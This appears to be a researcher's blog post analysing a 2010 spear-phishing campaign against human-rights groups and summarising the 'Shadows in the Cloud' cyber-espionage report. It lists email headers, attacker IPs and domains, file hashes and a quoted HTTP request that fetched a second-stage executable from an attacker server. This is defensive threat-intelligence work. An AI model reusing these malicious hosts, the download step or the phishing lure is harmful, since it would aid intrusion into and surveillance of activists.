: [REDACTED]
Sent: Thursday, March 18, 2010 9:46 AM
Subject
: Microsoft, Stool Pigeon for the Cops and FBI

 

I’ve got my hands on a copy of the leaked, confidential Microsoft “Global Criminal Compliance Handbook,” which details for police and intelligence services exactly what information Microsoft collects about users of its online services, and how they can be accessed. What is gathered and available about you is quite comprehensive, including your emails, detailed information about when you sign in and use the services, credit card information, and so on. Attachments are scanned copies of documents.

For the whole documents, please visit http://www.cfcr2008.org

Email Headers

Although the email appeared to be from HRIC it was actually sent from the following location:

Sender: selina@avghost.net <mailto:selina@avghost.net>
Received
: from mail.idcsea.com.cn (mail.idcsea.com.cn [208.77.45.130])
X-mailer: Foxmail 5.0 [cn]

 

The email headers reveal that the attackers actually sent the email from the following IP address:

208.77.45.130
OrgName: DCS Pacific Star, LLC
OrgID: DCSPA
Address
: 5050 El Camino Real, #238
City: Los Altos
StateProv: CA
PostalCode
: 94022
Country: US

The email encouraged recipients to visit cfcr2008.org, the website of an organization called the Coalition for Citizen’s Rights. This organization is a vocal opponent of the Chinese government.

The attackers compromised the website and inserted malicious code that caused vulnerable visitors to silently load a malicious PDF document that infected the users computer with malware.

Image 1 Compromised site: cfcr2008.org -> cfcr.i1024.com

Image 2 js_men.asp

The malicious PDF was hosted on www.520520.com.tw (203.69.42.41), a website located in Taiwan. This malicious file has very low antivirus coverage. Only eight out of forty-two anti-virus products detected the file as malware.

Item 3

Filename readme.pdf
Filetype PDF
CVE ?
MD5 72bdca7dd12ed04b21dfa60c5c2ab6c4

Virustotal: 8/42 (19.05%)
http://www.virustotal.com/analisis/dbfded7c7401b8128f39f8e8834bafe7a11addfa9b4c5a1bb9247243a443a4b1-1269343609

http://wepawet.cs.ucsb.edu/view.php?hash=f2275da93b6f708e80a84176f64d7dfe&t=1269304734&type=js

The malware dropped by the malicious PDF issued another connection, this time to www.humanright-watch.org (204.16.193.39). This is a server under the control of the attackers. The malware made a request for another executable, which appeared to be encrypted and which no antivirus products detected as malicious.

Item 4

GET /fun.exe HTTP/1.1
Host: www.humanright-watch.org

Filename fun.exe
Filetype EXE
CVE ?
MD5 ec16143a14c091100e7af30de03fce1f

Virustotal: 0/42 (0%)
http://www.virustotal.com/analisis/8cc9dc5d07b4a9b4dca13923779a16a17e772dfbb2b7d2aa0425b5f8e03b2f1f-1269343660

Interestingly, the IP address of www.humanright-watch.org (204.16.193.39) is assigned to the same company, DCS Pacific Star, LLC, as the IP address used to send the malicious email (208.77.45.130).

The new malware downloaded from www.humanright-watch.org (204.16.193.39) began encrypted communications with a command and control server located in China at 360liveupdate.com(117.85.48.157).

Image 5

The command and control server is located in Jiangsu Province, China:

117.85.48.157
inetnum
: 117.80.0.0 – 117.95.255.255
netname
: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr
: Beijing 100088
country
: CN

Conclusion

The nexus of censorship, surveillance, and malware attacks enable strict information control policies in China that extend beyond China’s boundaries to affect civil society organizations around the world. An increasing number of targeted malware attacks against civil society organizations are being reported. In many cases, the attacks can be traced back to command and control infrastructure located in China. These attacks leverage trust among members of social and political networks using human rights themes and spoofed identities to encourage targeted users to execute malicious code. From that point, unknown attackers have full control over the users’ computers and can conduct surveillance, exfiltrate sensitive information, and use the computer as a staging ground for future attacks.


The original version of this article is available here and in Chinese here.

Shadows in the Cloud



Last year, at just about this time, the InfoWar Monitor (IWM) released the “Tracking GhostNet” report which detailed our investigation into a cyber-espionage network that has compromised 1200+ computer systems spread across 103 countries, including ministries of foreign affairs, embassies, international organizations, news organizations, and even a computer located at NATO headquarters.

I remember when I stumbled upon the GhostNet attacker’s command and control interface by Googling a string of text from the network traffic obtained during our field investigation from a compromised computer at the Dalai Lama’s office in Dharamsala , India. To my surprise Google returned several results, which I clicked, and was suddenly looking at an interface that allowed the attackers to fully control a network of compromised computer system. When the report came out and I realized the significance of the find I thought that there was no way it would happen again. I was wrong.

Today the IWM and the Shadowserver Foundation have released a report “Shadows in the Cloud: An investigation into cyber espionage 2.0” (mirror) in which we document another targeted malware network. (NYT coverage here). We started by exploring one of the malware networks described in the GhostNet report but was an entirely separate malware network that had also compromised computers at the Dalai Lama’s office. I cannot stress just how important the trust, collaboration and information sharing across all those involved in this report from the Citizen Lab, SecDev , and Shadowserver, along with the Dalai Lama’s Office were to the success of the project.

As a result we were able to document another network of compromised government, business, and academic computer systems in India, the Office of the Dalai Lama, and the United Nations as well as numerous other institutions, including the Embassy of Pakistan in the United States.

In the report we enumerated a complex and tiered command and control infrastructure. The attackers misused a variety of services including Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo! Mail in order to maintain persistent control over the compromised computers. This top layer directed compromised computers to accounts on free web hosting services, and as the free hosting servers were disabled, to a stable core of command and control servers located in China.

This time, unlike GhostNet, we were able to recover data, some of which are highly sensitive, from a drop zone used by the attackers. One day, while exploring open directories on one of the command and control servers I noticed that there were files in a directory that was normally empty. It turned out that the attackers were directing compromised computers to upload data to this directory; the attackers subsequently moved the data off to another location and deleted the files at fairly rapid, but intermittent time intervals.

We recovered a wide variety of documents including one document that appears to be encrypted diplomatic correspondence, two documents marked “SECRET”, six as “RESTRICTED” and five as “CONFIDENTIAL” which appear to belong to the Indian government. We also recovered documents including 1,500 letters sent from the Dalai Lama’s office between January and November 2009.

Based on the character of the documents (and not IP addresses) we assessed that we recovered documents from the National Security Council Secretariat (NSCS) of India, the Embassy of India, Kabul, the Embassy of India, Moscow, the Consulate General of India, Dubai, and the High Commission of India in Abuja, Nigeria. In addition, we recovered documents from India’s Military Engineer Services (MES) and other military personnel as well as the Army Institute of Technology in Pune, Maharashtra and the Military College of Electronics and Mechanical Engineering in Secunderabad, Andhra Pradesh. Documents from a variety of other entities including the Institute for Defence Studies and Analyses as well as India Strategic defence magazine and FORCE magazine were compromised.

Questions regarding those who are ultimately responsible for this cyber-espionage network remain unanswered. We were, however, able to benefit from a great investigation by The Dark Visitor who tracked down lost33, the person who registered some of the Shadow network’s domain names that we published in the GhostNet report and his connections ot the underground hacking community in China. Based on the IP and email addresses used by the attackers we were able to link the attackers to several posts on apartment rental sites in Chengdu.

This, of course, does not reveal the role of these specific individuals nor the motivation behind the attacks. However, the connection that The Dark Visitor drew between lost33 and the underground hacking community in China does indicate that motivations such as patriotic hacking and cybercrime may have played a role. Finally, the nature of the data stolen by the attackers does indicate correlations with the strategic interests
of the Chinese state. But, we were unable to determine any direct connection between these attackers and elements of the Chinese state. However, it would not be implausible to suggest that the stolen data may have ended up in the possession of some entity of the Chinese government.

Now having reported this incident to the China CERT — which handles security incidents in China — I look forward to working with them to shut down this malware network.

This is an investigation in progress. There are many threads in this investigation that have still to be fully explored. I hope that this report provides enough detail to allow others with different specializations to continue to explore aspects of the Shadow network enriching our collective understanding of this incident and the broader implications regarding both cyber-crime and cyber-espionage.